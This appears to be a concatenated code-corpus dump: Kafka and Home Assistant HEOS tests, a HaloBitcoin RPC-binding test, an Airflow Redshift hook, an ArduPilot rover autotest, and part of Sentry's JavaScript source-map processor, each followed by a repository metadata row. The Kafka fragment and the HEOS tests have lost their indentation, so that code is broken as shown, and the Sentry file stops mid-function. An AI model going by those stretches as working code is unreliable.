assert resolver.script("kafka-run-class.sh", V_0_9_0_1) == "/opt/kafka-0.9.0.1/bin/kafka-run-class.sh"
    def check_node_or_version_helper(self):
        """KafkaSystemTestPathResolver has a helper method which takes either a node
        or a version and returns the version. Check expected behavior here.
        """
resolver = create_path_resolver(DummyContext())
# Node with no version attribute should resolve to DEV_BRANCH
node = DummyNode()
assert resolver._version(node) == DEV_BRANCH
# Node with version attribute should resolve to the version attribute
node.version = V_0_9_0_1
assert resolver._version(node) == V_0_9_0_1
# A KafkaVersion object should resolve to itself
assert resolver._version(DEV_BRANCH) == DEV_BRANCH
version = KafkaVersion("999.999.999")
assert resolver._version(version) == version
| apache-2.0 | -5,203,107,733,110,843,000 | 40.1 | 117 | 0.691538 | false |
auduny/home-assistant | tests/components/heos/test_config_flow.py | 6 | 4313 | """Tests for the Heos config flow module."""
import asyncio
from homeassistant import data_entry_flow
from homeassistant.components.heos.config_flow import HeosFlowHandler
from homeassistant.components.heos.const import DATA_DISCOVERED_HOSTS, DOMAIN
from homeassistant.const import CONF_HOST, CONF_NAME
async def test_flow_aborts_already_setup(hass, config_entry):
"""Test flow aborts when entry already setup."""
config_entry.add_to_hass(hass)
flow = HeosFlowHandler()
flow.hass = hass
result = await flow.async_step_user()
assert result['type'] == data_entry_flow.RESULT_TYPE_ABORT
assert result['reason'] == 'already_setup'
async def test_no_host_shows_form(hass):
"""Test form is shown when host not provided."""
flow = HeosFlowHandler()
flow.hass = hass
result = await flow.async_step_user()
assert result['type'] == data_entry_flow.RESULT_TYPE_FORM
assert result['step_id'] == 'user'
assert result['errors'] == {}
async def test_cannot_connect_shows_error_form(hass, controller):
"""Test form is shown with error when cannot connect."""
flow = HeosFlowHandler()
flow.hass = hass
errors = [ConnectionError, asyncio.TimeoutError]
for error in errors:
controller.connect.side_effect = error
result = await flow.async_step_user({CONF_HOST: '127.0.0.1'})
assert result['type'] == data_entry_flow.RESULT_TYPE_FORM
assert result['step_id'] == 'user'
assert result['errors'][CONF_HOST] == 'connection_failure'
assert controller.connect.call_count == 1
assert controller.disconnect.call_count == 1
controller.connect.reset_mock()
controller.disconnect.reset_mock()
async def test_create_entry_when_host_valid(hass, controller):
"""Test result type is create entry when host is valid."""
flow = HeosFlowHandler()
flow.hass = hass
data = {CONF_HOST: '127.0.0.1'}
result = await flow.async_step_user(data)
assert result['type'] == data_entry_flow.RESULT_TYPE_CREATE_ENTRY
assert result['title'] == 'Controller (127.0.0.1)'
assert result['data'] == data
assert controller.connect.call_count == 1
assert controller.disconnect.call_count == 1
async def test_create_entry_when_friendly_name_valid(hass, controller):
"""Test result type is create entry when friendly name is valid."""
hass.data[DATA_DISCOVERED_HOSTS] = {"Office (127.0.0.1)": "127.0.0.1"}
flow = HeosFlowHandler()
flow.hass = hass
data = {CONF_HOST: "Office (127.0.0.1)"}
result = await flow.async_step_user(data)
assert result['type'] == data_entry_flow.RESULT_TYPE_CREATE_ENTRY
assert result['title'] == 'Controller (127.0.0.1)'
assert result['data'] == {CONF_HOST: "127.0.0.1"}
assert controller.connect.call_count == 1
assert controller.disconnect.call_count == 1
assert DATA_DISCOVERED_HOSTS not in hass.data
async def test_discovery_shows_create_form(hass, controller, discovery_data):
"""Test discovery shows form to confirm setup and subsequent abort."""
await hass.config_entries.flow.async_init(
DOMAIN, context={'source': 'discovery'},
data=discovery_data)
await hass.async_block_till_done()
assert len(hass.config_entries.flow.async_progress()) == 1
assert hass.data[DATA_DISCOVERED_HOSTS] == {
"Office (127.0.0.1)": "127.0.0.1"
}
discovery_data[CONF_HOST] = "127.0.0.2"
discovery_data[CONF_NAME] = "Bedroom"
await hass.config_entries.flow.async_init(
DOMAIN, context={'source': 'discovery'},
data=discovery_data)
await hass.async_block_till_done()
assert len(hass.config_entries.flow.async_progress()) == 1
assert hass.data[DATA_DISCOVERED_HOSTS] == {
"Office (127.0.0.1)": "127.0.0.1",
"Bedroom (127.0.0.2)": "127.0.0.2"
}
async def test_discovery_flow_aborts_already_setup(
hass, controller, discovery_data, config_entry):
"""Test discovery flow aborts when entry already setup."""
config_entry.add_to_hass(hass)
flow = HeosFlowHandler()
flow.hass = hass
result = await flow.async_step_discovery(discovery_data)
assert result['type'] == data_entry_flow.RESULT_TYPE_ABORT
assert result['reason'] == 'already_setup'
| apache-2.0 | 5,080,596,128,137,261,000 | 38.935185 | 77 | 0.669372 | false |
HaloExchange/HaloBitcoin | qa/rpc-tests/rpcbind_test.py | 1 | 5788 | #!/usr/bin/env python2
# Copyright (c) 2014 The Halo Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
# Test for -rpcbind, as well as -rpcallowip and -rpcconnect
# Add python-halobitcoinrpc to module search path:
import os
import sys
sys.path.append(os.path.join(os.path.dirname(os.path.abspath(__file__)), "python-halobitcoinrpc"))
import json
import shutil
import subprocess
import tempfile
import traceback
from halobitcoinrpc.authproxy import AuthServiceProxy, JSONRPCException
from util import *
from netutil import *
def run_bind_test(tmpdir, allow_ips, connect_to, addresses, expected):
'''
Start a node with requested rpcallowip and rpcbind parameters,
then try to connect, and check if the set of bound addresses
matches the expected set.
'''
expected = [(addr_to_hex(addr), port) for (addr, port) in expected]
base_args = ['-disablewallet', '-nolisten']
if allow_ips:
base_args += ['-rpcallowip=' + x for x in allow_ips]
binds = ['-rpcbind='+addr for addr in addresses]
nodes = start_nodes(1, tmpdir, [base_args + binds], connect_to)
try:
pid = halobitcoind_processes[0].pid
assert_equal(set(get_bind_addrs(pid)), set(expected))
finally:
stop_nodes(nodes)
wait_halobitcoinds()
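# Example (a sketch mirroring the first explicit check in run_test() below):
#
#   run_bind_test(tmpdir, ['127.0.0.1'], '127.0.0.1', ['127.0.0.1'],
#                 [('127.0.0.1', defaultport)])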
def run_allowip_test(tmpdir, allow_ips, rpchost, rpcport):
'''
    Start a node with rpcallowip, and request getinfo
at a non-localhost IP.
'''
base_args = ['-disablewallet', '-nolisten'] + ['-rpcallowip='+x for x in allow_ips]
nodes = start_nodes(1, tmpdir, [base_args])
try:
# connect to node through non-loopback interface
url = "http://rt:rt@%s:%d" % (rpchost, rpcport,)
node = AuthServiceProxy(url)
node.getinfo()
finally:
node = None # make sure connection will be garbage collected and closed
stop_nodes(nodes)
wait_halobitcoinds()
def run_test(tmpdir):
assert(sys.platform == 'linux2') # due to OS-specific network stats queries, this test works only on Linux
# find the first non-loopback interface for testing
non_loopback_ip = None
for name,ip in all_interfaces():
if ip != '127.0.0.1':
non_loopback_ip = ip
break
if non_loopback_ip is None:
assert(not 'This test requires at least one non-loopback IPv4 interface')
print("Using interface %s for testing" % non_loopback_ip)
defaultport = rpc_port(0)
# check default without rpcallowip (IPv4 and IPv6 localhost)
run_bind_test(tmpdir, None, '127.0.0.1', [],
[('127.0.0.1', defaultport), ('::1', defaultport)])
# check default with rpcallowip (IPv6 any)
run_bind_test(tmpdir, ['127.0.0.1'], '127.0.0.1', [],
[('::0', defaultport)])
# check only IPv4 localhost (explicit)
run_bind_test(tmpdir, ['127.0.0.1'], '127.0.0.1', ['127.0.0.1'],
[('127.0.0.1', defaultport)])
# check only IPv4 localhost (explicit) with alternative port
run_bind_test(tmpdir, ['127.0.0.1'], '127.0.0.1:32171', ['127.0.0.1:32171'],
[('127.0.0.1', 32171)])
# check only IPv4 localhost (explicit) with multiple alternative ports on same host
run_bind_test(tmpdir, ['127.0.0.1'], '127.0.0.1:32171', ['127.0.0.1:32171', '127.0.0.1:32172'],
[('127.0.0.1', 32171), ('127.0.0.1', 32172)])
# check only IPv6 localhost (explicit)
run_bind_test(tmpdir, ['[::1]'], '[::1]', ['[::1]'],
[('::1', defaultport)])
# check both IPv4 and IPv6 localhost (explicit)
run_bind_test(tmpdir, ['127.0.0.1'], '127.0.0.1', ['127.0.0.1', '[::1]'],
[('127.0.0.1', defaultport), ('::1', defaultport)])
# check only non-loopback interface
run_bind_test(tmpdir, [non_loopback_ip], non_loopback_ip, [non_loopback_ip],
[(non_loopback_ip, defaultport)])
# Check that with invalid rpcallowip, we are denied
run_allowip_test(tmpdir, [non_loopback_ip], non_loopback_ip, defaultport)
try:
run_allowip_test(tmpdir, ['1.1.1.1'], non_loopback_ip, defaultport)
assert(not 'Connection not denied by rpcallowip as expected')
except ValueError:
pass
def main():
import optparse
parser = optparse.OptionParser(usage="%prog [options]")
parser.add_option("--nocleanup", dest="nocleanup", default=False, action="store_true",
help="Leave halobitcoinds and test.* datadir on exit or error")
parser.add_option("--srcdir", dest="srcdir", default="../../src",
help="Source directory containing halobitcoind/halobitcoin-cli (default: %default%)")
parser.add_option("--tmpdir", dest="tmpdir", default=tempfile.mkdtemp(prefix="test"),
help="Root directory for datadirs")
(options, args) = parser.parse_args()
os.environ['PATH'] = options.srcdir+":"+os.environ['PATH']
check_json_precision()
success = False
nodes = []
try:
print("Initializing test directory "+options.tmpdir)
if not os.path.isdir(options.tmpdir):
os.makedirs(options.tmpdir)
initialize_chain(options.tmpdir)
run_test(options.tmpdir)
success = True
except AssertionError as e:
print("Assertion failed: "+e.message)
except Exception as e:
print("Unexpected exception caught during testing: "+str(e))
traceback.print_tb(sys.exc_info()[2])
if not options.nocleanup:
print("Cleaning up")
wait_halobitcoinds()
shutil.rmtree(options.tmpdir)
if success:
print("Tests successful")
sys.exit(0)
else:
print("Failed")
sys.exit(1)
if __name__ == '__main__':
main()
| mit | 5,010,387,231,019,260,000 | 36.584416 | 110 | 0.63217 | false |
gilt/incubator-airflow | airflow/contrib/hooks/redshift_hook.py | 4 | 4303 | # -*- coding: utf-8 -*-
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from airflow.contrib.hooks.aws_hook import AwsHook
class RedshiftHook(AwsHook):
"""
Interact with AWS Redshift, using the boto3 library
"""
def get_conn(self):
return self.get_client_type('redshift')
def cluster_status(self, cluster_identifier):
"""
Return status of a cluster
:param cluster_identifier: unique identifier of a cluster whose properties you are requesting
:type cluster_identifier: str
"""
# Use describe clusters
response = self.get_conn().describe_clusters(ClusterIdentifier=cluster_identifier)
# Possibly return error if cluster does not exist
return response['Clusters'][0]['ClusterStatus'] if response['Clusters'] else None
def delete_cluster(self, cluster_identifier, skip_final_cluster_snapshot=True, final_cluster_snapshot_identifier=''):
"""
Delete a cluster and optionally create a snapshot
:param cluster_identifier: unique identifier of a cluster whose properties you are requesting
:type cluster_identifier: str
:param skip_final_cluster_snapshot: determines if a final cluster snapshot is made before shut-down
:type skip_final_cluster_snapshot: bool
:param final_cluster_snapshot_identifier: name of final cluster snapshot
:type final_cluster_snapshot_identifier: str
"""
        response = self.get_conn().delete_cluster(
            ClusterIdentifier=cluster_identifier,
            SkipFinalClusterSnapshot=skip_final_cluster_snapshot,
            FinalClusterSnapshotIdentifier=final_cluster_snapshot_identifier
        )
return response['Cluster'] if response['Cluster'] else None
def describe_cluster_snapshots(self, cluster_identifier):
"""
Gets a list of snapshots for a cluster
:param cluster_identifier: unique identifier of a cluster whose properties you are requesting
:type cluster_identifier: str
"""
        response = self.get_conn().describe_cluster_snapshots(
            ClusterIdentifier=cluster_identifier
        )
if 'Snapshots' not in response:
return None
snapshots = response['Snapshots']
        snapshots = [snapshot for snapshot in snapshots if snapshot['Status']]
        snapshots.sort(key=lambda x: x['SnapshotCreateTime'], reverse=True)
return snapshots
def restore_from_cluster_snapshot(self, cluster_identifier, snapshot_identifier):
"""
        Restores a cluster from its snapshot
:param cluster_identifier: unique identifier of a cluster whose properties you are requesting
:type cluster_identifier: str
:param snapshot_identifier: unique identifier for a snapshot of a cluster
:type snapshot_identifier: str
"""
        response = self.get_conn().restore_from_cluster_snapshot(
            ClusterIdentifier=cluster_identifier,
            SnapshotIdentifier=snapshot_identifier
        )
return response['Cluster'] if response['Cluster'] else None
def create_cluster_snapshot(self, snapshot_identifier, cluster_identifier):
"""
Creates a snapshot of a cluster
:param snapshot_identifier: unique identifier for a snapshot of a cluster
:type snapshot_identifier: str
:param cluster_identifier: unique identifier of a cluster whose properties you are requesting
:type cluster_identifier: str
"""
response = self.get_conn().create_cluster_snapshot(
SnapshotIdentifier=snapshot_identifier,
ClusterIdentifier=cluster_identifier,
)
return response['Snapshot'] if response['Snapshot'] else None
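# Usage sketch (an illustration; assumes an Airflow connection id
# 'aws_default' with Redshift permissions and an existing cluster named
# 'my-cluster'):
#
#   hook = RedshiftHook(aws_conn_id='aws_default')
#   if hook.cluster_status('my-cluster') == 'available':
#       hook.create_cluster_snapshot('my-snapshot', 'my-cluster')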
| apache-2.0 | -6,880,765,821,336,381,000 | 42.03 | 121 | 0.684174 | false |
dberroya/trad-arducopter | Tools/autotest/apmrover2.py | 5 | 5487 | # drive APMrover2 in SITL
import util, pexpect, sys, time, math, shutil, os
from common import *
from pymavlink import mavutil
import random
# get location of scripts
testdir=os.path.dirname(os.path.realpath(__file__))
#HOME=mavutil.location(-35.362938,149.165085,584,270)
HOME=mavutil.location(40.071374969556928,-105.22978898137808,1583.702759,246)
homeloc = None
def drive_left_circuit(mavproxy, mav):
'''drive a left circuit, 50m on a side'''
mavproxy.send('switch 6\n')
wait_mode(mav, 'MANUAL')
mavproxy.send('rc 3 2000\n')
print("Driving left circuit")
# do 4 turns
for i in range(0,4):
# hard left
print("Starting turn %u" % i)
mavproxy.send('rc 1 1000\n')
if not wait_heading(mav, 270 - (90*i), accuracy=10):
return False
mavproxy.send('rc 1 1500\n')
print("Starting leg %u" % i)
if not wait_distance(mav, 50, accuracy=7):
return False
mavproxy.send('rc 3 1500\n')
print("Circuit complete")
return True
def drive_RTL(mavproxy, mav):
'''drive to home'''
print("Driving home in RTL")
mavproxy.send('switch 3\n')
if not wait_location(mav, homeloc, accuracy=22, timeout=90):
return False
print("RTL Complete")
return True
def setup_rc(mavproxy):
'''setup RC override control'''
for chan in [1,2,3,4,5,6,7]:
mavproxy.send('rc %u 1500\n' % chan)
mavproxy.send('rc 8 1800\n')
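# Note: the helpers here assume the default ArduRover RC mapping, where
# channel 1 is steering, channel 3 is throttle and channel 8 selects the
# mode (an assumption based on the standard SITL configuration).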
def drive_mission(mavproxy, mav, filename):
'''drive a mission from a file'''
global homeloc
print("Driving mission %s" % filename)
mavproxy.send('wp load %s\n' % filename)
mavproxy.expect('flight plan received')
mavproxy.send('wp list\n')
mavproxy.expect('Requesting [0-9]+ waypoints')
mavproxy.send('switch 4\n') # auto mode
mavproxy.send('rc 3 1500\n')
wait_mode(mav, 'AUTO')
if not wait_waypoint(mav, 1, 4, max_dist=5):
return False
wait_mode(mav, 'HOLD')
print("Mission OK")
return True
def drive_APMrover2(viewerip=None, map=False):
'''drive APMrover2 in SIL
you can pass viewerip as an IP address to optionally send fg and
mavproxy packets too for local viewing of the mission in real time
'''
global homeloc
options = '--sitl=127.0.0.1:5501 --out=127.0.0.1:19550 --streamrate=10'
if viewerip:
options += " --out=%s:14550" % viewerip
if map:
options += ' --map --console'
sil = util.start_SIL('APMrover2', wipe=True)
mavproxy = util.start_MAVProxy_SIL('APMrover2', options=options)
mavproxy.expect('Received [0-9]+ parameters')
# setup test parameters
mavproxy.send('param set SYSID_THISMAV %u\n' % random.randint(100, 200))
mavproxy.send("param load %s/Rover.parm\n" % testdir)
mavproxy.expect('Loaded [0-9]+ parameters')
# restart with new parms
util.pexpect_close(mavproxy)
util.pexpect_close(sil)
sim_cmd = util.reltopdir('Tools/autotest/pysim/sim_rover.py') + ' --rate=50 --home=%f,%f,%u,%u' % (
HOME.lat, HOME.lng, HOME.alt, HOME.heading)
runsim = pexpect.spawn(sim_cmd, logfile=sys.stdout, timeout=10)
runsim.delaybeforesend = 0
util.pexpect_autoclose(runsim)
runsim.expect('Starting at lat')
sil = util.start_SIL('APMrover2')
mavproxy = util.start_MAVProxy_SIL('APMrover2', options=options)
mavproxy.expect('Logging to (\S+)')
logfile = mavproxy.match.group(1)
print("LOGFILE %s" % logfile)
buildlog = util.reltopdir("../buildlogs/APMrover2-test.tlog")
print("buildlog=%s" % buildlog)
if os.path.exists(buildlog):
os.unlink(buildlog)
try:
os.link(logfile, buildlog)
except Exception:
pass
mavproxy.expect('Received [0-9]+ parameters')
util.expect_setup_callback(mavproxy, expect_callback)
expect_list_clear()
expect_list_extend([runsim, sil, mavproxy])
print("Started simulator")
# get a mavlink connection going
try:
mav = mavutil.mavlink_connection('127.0.0.1:19550', robust_parsing=True)
    except Exception as msg:
        print("Failed to start mavlink connection on 127.0.0.1:19550: %s" % msg)
        raise
mav.message_hooks.append(message_hook)
mav.idle_hooks.append(idle_hook)
failed = False
e = 'None'
try:
print("Waiting for a heartbeat with mavlink protocol %s" % mav.WIRE_PROTOCOL_VERSION)
mav.wait_heartbeat()
print("Setting up RC parameters")
setup_rc(mavproxy)
print("Waiting for GPS fix")
mav.wait_gps_fix()
homeloc = mav.location()
print("Home location: %s" % homeloc)
if not drive_mission(mavproxy, mav, os.path.join(testdir, "rover1.txt")):
print("Failed mission")
failed = True
# if not drive_left_circuit(mavproxy, mav):
# print("Failed left circuit")
# failed = True
# if not drive_RTL(mavproxy, mav):
# print("Failed RTL")
# failed = True
    except pexpect.TIMEOUT as e:
print("Failed with timeout")
failed = True
mav.close()
util.pexpect_close(mavproxy)
util.pexpect_close(sil)
util.pexpect_close(runsim)
if os.path.exists('APMrover2-valgrind.log'):
os.chmod('APMrover2-valgrind.log', 0644)
shutil.copy("APMrover2-valgrind.log", util.reltopdir("../buildlogs/APMrover2-valgrind.log"))
if failed:
print("FAILED: %s" % e)
return False
return True
| gpl-3.0 | -7,648,395,719,199,807,000 | 30.176136 | 103 | 0.632951 | false |
ngonzalvez/sentry | src/sentry/lang/javascript/processor.py | 4 | 21634 | from __future__ import absolute_import, print_function
__all__ = ['SourceProcessor']
import logging
import re
import base64
from django.conf import settings
from django.core.exceptions import SuspiciousOperation
from collections import namedtuple
from hashlib import md5
from os.path import splitext
from requests.exceptions import RequestException
from simplejson import JSONDecodeError
from urlparse import urlparse, urljoin, urlsplit
# In case SSL is unavailable (light builds) we can't import this here.
try:
from OpenSSL.SSL import ZeroReturnError
except ImportError:
class ZeroReturnError(Exception):
pass
from sentry import http
from sentry.interfaces.stacktrace import Stacktrace
from sentry.models import EventError, Release, ReleaseFile
from sentry.event_manager import generate_culprit
from sentry.utils.cache import cache
from sentry.utils.http import is_valid_origin
from .cache import SourceCache, SourceMapCache
from .sourcemaps import sourcemap_to_index, find_source
# number of surrounding lines (on each side) to fetch
LINES_OF_CONTEXT = 5
BASE64_SOURCEMAP_PREAMBLE = 'data:application/json;base64,'
BASE64_PREAMBLE_LENGTH = len(BASE64_SOURCEMAP_PREAMBLE)
UNKNOWN_MODULE = '<unknown module>'
CLEAN_MODULE_RE = re.compile(r"""^
(?:/| # Leading slashes
(?:
(?:java)?scripts?|js|build|static|node_modules|bower_components|[_\.].*?| # common folder prefixes
v?(?:\d+\.)*\d+| # version numbers, v1, 1.0.0
[a-f0-9]{7,8}| # short sha
[a-f0-9]{32}| # md5
[a-f0-9]{40} # sha1
)/)+|
(?:[-\.][a-f0-9]{7,}$) # Ending in a commitish
""", re.X | re.I)
VERSION_RE = re.compile(r'^[a-f0-9]{32}|[a-f0-9]{40}$', re.I)
# the maximum number of remote resources (i.e. source files) that should be
# fetched
MAX_RESOURCE_FETCHES = 100
# TODO(dcramer): we want to change these to be constants so they are easier
# to translate/link again
UrlResult = namedtuple('UrlResult', ['url', 'headers', 'body'])
logger = logging.getLogger(__name__)
class BadSource(Exception):
error_type = EventError.UNKNOWN_ERROR
def __init__(self, data=None):
if data is None:
data = {}
data.setdefault('type', self.error_type)
super(BadSource, self).__init__(data['type'])
self.data = data
class CannotFetchSource(BadSource):
error_type = EventError.JS_GENERIC_FETCH_ERROR
class UnparseableSourcemap(BadSource):
error_type = EventError.JS_INVALID_SOURCEMAP
def trim_line(line, column=0):
"""
Trims a line down to a goal of 140 characters, with a little
wiggle room to be sensible and tries to trim around the given
`column`. So it tries to extract 60 characters before and after
the provided `column` and yield a better context.
"""
line = line.strip('\n')
ll = len(line)
if ll <= 150:
return line
if column > ll:
column = ll
start = max(column - 60, 0)
# Round down if it brings us close to the edge
if start < 5:
start = 0
end = min(start + 140, ll)
# Round up to the end if it's close
if end > ll - 5:
end = ll
# If we are bumped all the way to the end,
# make sure we still get a full 140 characters in the line
if end == ll:
start = max(end - 140, 0)
line = line[start:end]
if end < ll:
# we've snipped from the end
line += ' {snip}'
if start > 0:
# we've snipped from the beginning
line = '{snip} ' + line
return line
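# A rough illustration (not exact output; the snip boundaries depend on
# the column): trim_line('a' * 300, column=150) returns roughly 140
# characters centered on the column, wrapped as '{snip} ... {snip}'.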
def get_source_context(source, lineno, colno, context=LINES_OF_CONTEXT):
if not source:
return [], '', []
# lineno's in JS are 1-indexed
# just in case. sometimes math is hard
if lineno > 0:
lineno -= 1
lower_bound = max(0, lineno - context)
upper_bound = min(lineno + 1 + context, len(source))
try:
pre_context = map(trim_line, source[lower_bound:lineno])
except IndexError:
pre_context = []
try:
context_line = trim_line(source[lineno], colno)
except IndexError:
context_line = ''
try:
post_context = map(trim_line, source[(lineno + 1):upper_bound])
except IndexError:
post_context = []
return pre_context, context_line, post_context
def discover_sourcemap(result):
"""
Given a UrlResult object, attempt to discover a sourcemap.
"""
# When coercing the headers returned by urllib to a dict
# all keys become lowercase so they're normalized
sourcemap = result.headers.get('sourcemap', result.headers.get('x-sourcemap'))
if not sourcemap:
parsed_body = result.body.splitlines()
# Source maps are only going to exist at either the top or bottom of the document.
# Technically, there isn't anything indicating *where* it should exist, so we
# are generous and assume it's somewhere either in the first or last 5 lines.
# If it's somewhere else in the document, you're probably doing it wrong.
if len(parsed_body) > 10:
possibilities = parsed_body[:5] + parsed_body[-5:]
else:
possibilities = parsed_body
# We want to scan each line sequentially, and the last one found wins
# This behavior is undocumented, but matches what Chrome and Firefox do.
for line in possibilities:
if line[:21] in ('//# sourceMappingURL=', '//@ sourceMappingURL='):
# We want everything AFTER the indicator, which is 21 chars long
sourcemap = line[21:].rstrip()
if sourcemap:
# fix url so its absolute
sourcemap = urljoin(result.url, sourcemap)
return sourcemap
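# For example, a minified file typically ends with a trailer such as...
#
#   //# sourceMappingURL=app.min.js.map
#
# ...which discover_sourcemap() resolves against the file's own URL.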
def fetch_release_file(filename, release):
cache_key = 'releasefile:%s:%s' % (
release.id,
md5(filename.encode('utf-8')).hexdigest(),
)
    logger.debug('Checking cache for release artifact %r (release_id=%s)',
                 filename, release.id)
result = cache.get(cache_key)
if result is None:
logger.debug('Checking database for release artifact %r (release_id=%s)',
filename, release.id)
ident = ReleaseFile.get_ident(filename)
try:
releasefile = ReleaseFile.objects.filter(
release=release,
ident=ident,
).select_related('file').get()
except ReleaseFile.DoesNotExist:
logger.debug('Release artifact %r not found in database (release_id=%s)',
filename, release.id)
cache.set(cache_key, -1, 60)
return None
logger.debug('Found release artifact %r (id=%s, release_id=%s)',
filename, releasefile.id, release.id)
with releasefile.file.getfile() as fp:
body = fp.read()
result = (releasefile.file.headers, body, 200)
cache.set(cache_key, result, 300)
elif result == -1:
result = None
return result
def fetch_url(url, project=None, release=None):
"""
Pull down a URL, returning a UrlResult object.
Attempts to fetch from the cache.
"""
cache_key = 'source:cache:v2:%s' % (
md5(url.encode('utf-8')).hexdigest(),
)
if release:
result = fetch_release_file(url, release)
else:
result = None
if result is None:
logger.debug('Checking cache for url %r', url)
result = cache.get(cache_key)
if result is None:
# lock down domains that are problematic
domain = urlparse(url).netloc
domain_key = 'source:blacklist:v2:%s' % (
md5(domain.encode('utf-8')).hexdigest(),
)
domain_result = cache.get(domain_key)
if domain_result:
domain_result['url'] = url
raise CannotFetchSource(domain_result)
headers = {}
if project and is_valid_origin(url, project=project):
token = project.get_option('sentry:token')
if token:
headers['X-Sentry-Token'] = token
logger.debug('Fetching %r from the internet', url)
http_session = http.build_session()
try:
response = http_session.get(
url,
allow_redirects=True,
verify=False,
headers=headers,
timeout=settings.SENTRY_SOURCE_FETCH_TIMEOUT,
)
except Exception as exc:
logger.debug('Unable to fetch %r', url, exc_info=True)
if isinstance(exc, SuspiciousOperation):
error = {
'type': EventError.SECURITY_VIOLATION,
'value': unicode(exc),
'url': url,
}
elif isinstance(exc, (RequestException, ZeroReturnError)):
error = {
'type': EventError.JS_GENERIC_FETCH_ERROR,
'value': str(type(exc)),
'url': url,
}
else:
logger.exception(unicode(exc))
error = {
'type': EventError.UNKNOWN_ERROR,
'url': url,
}
# TODO(dcramer): we want to be less aggressive on disabling domains
cache.set(domain_key, error or '', 300)
logger.warning('Disabling sources to %s for %ss', domain, 300,
exc_info=True)
raise CannotFetchSource(error)
        # requests attempts to use chardet internally when no encoding is
        # found and we want to avoid that slow behavior
if not response.encoding:
response.encoding = 'utf-8'
result = (
{k.lower(): v for k, v in response.headers.items()},
response.text,
response.status_code,
)
cache.set(cache_key, result, 60)
if result[2] != 200:
logger.debug('HTTP %s when fetching %r', result[2], url,
exc_info=True)
error = {
'type': EventError.JS_INVALID_HTTP_CODE,
'value': result[2],
'url': url,
}
raise CannotFetchSource(error)
return UrlResult(url, result[0], result[1])
def fetch_sourcemap(url, project=None, release=None):
if is_data_uri(url):
body = base64.b64decode(url[BASE64_PREAMBLE_LENGTH:])
else:
result = fetch_url(url, project=project, release=release)
body = result.body
# According to various specs[1][2] a SourceMap may be prefixed to force
# a Javascript load error.
# [1] https://docs.google.com/document/d/1U1RGAehQwRypUTovF1KRlpiOFze0b-_2gc6fAH0KY0k/edit#heading=h.h7yy76c5il9v
# [2] http://www.html5rocks.com/en/tutorials/developertools/sourcemaps/#toc-xssi
if body.startswith((")]}'\n", ")]}\n")):
body = body.split('\n', 1)[1]
try:
return sourcemap_to_index(body)
except (JSONDecodeError, ValueError):
raise UnparseableSourcemap({
'url': url,
})
def is_data_uri(url):
return url[:BASE64_PREAMBLE_LENGTH] == BASE64_SOURCEMAP_PREAMBLE
def generate_module(src):
"""
Converts a url into a made-up module name by doing the following:
* Extract just the path name ignoring querystrings
* Trimming off the initial /
* Trimming off the file extension
    * Removes useless folder prefixes
e.g. http://google.com/js/v1.0/foo/bar/baz.js -> foo/bar/baz
"""
if not src:
return UNKNOWN_MODULE
filename, ext = splitext(urlsplit(src).path)
if ext not in ('.js', '.coffee'):
return UNKNOWN_MODULE
if filename.endswith('.min'):
filename = filename[:-4]
# TODO(dcramer): replace CLEAN_MODULE_RE with tokenizer completely
tokens = filename.split('/')
for idx, token in enumerate(tokens):
# a SHA
if VERSION_RE.match(token):
return '/'.join(tokens[idx + 1:])
return CLEAN_MODULE_RE.sub('', filename) or UNKNOWN_MODULE
class SourceProcessor(object):
"""
Attempts to fetch source code for javascript frames.
Frames must match the following requirements:
- lineno >= 0
- colno >= 0
- abs_path is the HTTP URI to the source
- context_line is empty
Mutates the input ``data`` with expanded context if available.
"""
def __init__(self, max_fetches=MAX_RESOURCE_FETCHES):
self.max_fetches = max_fetches
self.cache = SourceCache()
self.sourcemaps = SourceMapCache()
def get_stacktraces(self, data):
try:
stacktraces = [
e['stacktrace']
for e in data['sentry.interfaces.Exception']['values']
if e.get('stacktrace')
]
except KeyError:
stacktraces = []
if 'sentry.interfaces.Stacktrace' in data:
stacktraces.append(data['sentry.interfaces.Stacktrace'])
return [
(s, Stacktrace.to_python(s))
for s in stacktraces
]
def get_valid_frames(self, stacktraces):
# build list of frames that we can actually grab source for
frames = []
for _, stacktrace in stacktraces:
frames.extend([
f for f in stacktrace.frames
if f.lineno is not None
and f.is_url()
])
return frames
def get_release(self, project, data):
if not data.get('release'):
return
return Release.get(
project=project,
version=data['release'],
)
def process(self, project, data):
stacktraces = self.get_stacktraces(data)
if not stacktraces:
logger.debug('No stacktrace for event %r', data['event_id'])
return
frames = self.get_valid_frames(stacktraces)
if not frames:
logger.debug('Event %r has no frames with enough context to fetch remote source', data['event_id'])
return
data.setdefault('errors', [])
errors = data['errors']
release = self.get_release(project, data)
# all of these methods assume mutation on the original
# objects rather than re-creation
self.populate_source_cache(project, frames, release)
errors.extend(self.expand_frames(frames) or [])
self.ensure_module_names(frames)
self.fix_culprit(data, stacktraces)
self.update_stacktraces(stacktraces)
return data
def fix_culprit(self, data, stacktraces):
data['culprit'] = generate_culprit(data)
def update_stacktraces(self, stacktraces):
for raw, interface in stacktraces:
raw.update(interface.to_json())
def ensure_module_names(self, frames):
# TODO(dcramer): this doesn't really fit well with generic URLs so we
# whitelist it to http/https
for frame in frames:
if not frame.module and frame.abs_path.startswith(('http:', 'https:')):
frame.module = generate_module(frame.abs_path)
def expand_frames(self, frames):
last_state = None
state = None
has_changes = False
cache = self.cache
sourcemaps = self.sourcemaps
all_errors = []
for frame in frames:
errors = cache.get_errors(frame.abs_path)
if errors:
has_changes = True
all_errors.extend(errors)
source = cache.get(frame.abs_path)
if source is None:
logger.info('No source found for %s', frame.abs_path)
continue
sourcemap_url, sourcemap_idx = sourcemaps.get_link(frame.abs_path)
if sourcemap_idx and frame.colno is not None:
last_state = state
state = find_source(sourcemap_idx, frame.lineno, frame.colno)
if is_data_uri(sourcemap_url):
sourcemap_label = frame.abs_path
else:
sourcemap_label = sourcemap_url
abs_path = urljoin(sourcemap_url, state.src)
logger.debug('Mapping compressed source %r to mapping in %r', frame.abs_path, abs_path)
source = cache.get(abs_path)
if not source:
frame.data = {
'sourcemap': sourcemap_label,
}
errors = cache.get_errors(abs_path)
if errors:
all_errors.extend(errors)
else:
all_errors.append({
